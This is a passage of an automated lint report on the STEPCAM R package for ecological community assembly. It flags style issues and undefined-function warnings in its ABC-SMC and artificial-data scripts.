^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:26:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:136:5:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L136) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:137:28:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:137:28:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L137) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:12:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:29:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:149:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L149) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:149:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L149) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:151:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:153:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L153) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:181:20:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:181:20:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L181) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:182:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L182) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:183:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L183) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:184:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L184) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L188) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L196) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L198) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:14:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:198:14:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L198) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:9:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:27:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:19:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:207:14:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L207) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:18:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:17:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:17:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:17:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:24:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:40:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L214) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:216:24:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:40:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L216) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:217:13:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:13:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L221) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:221:14:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:34:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:21:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:227:22:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:229:13:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:229:38:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:247:54:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L247) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:250:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L250) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:9:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:32:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L251) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:254:27:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L254) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:254:27:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L254) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:255:20:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:20:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:20:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:61:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L264) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:268:63:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L268) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                             ~^~\n```\n[R/ABC_SMC.R:271:15:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n             ~^~~\n```\n[R/ABC_SMC.R:272:44:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/ABC_SMC.R#L272) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/a2b88270fc877ad4bebdf56de9d41b25e2e4fe6f/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 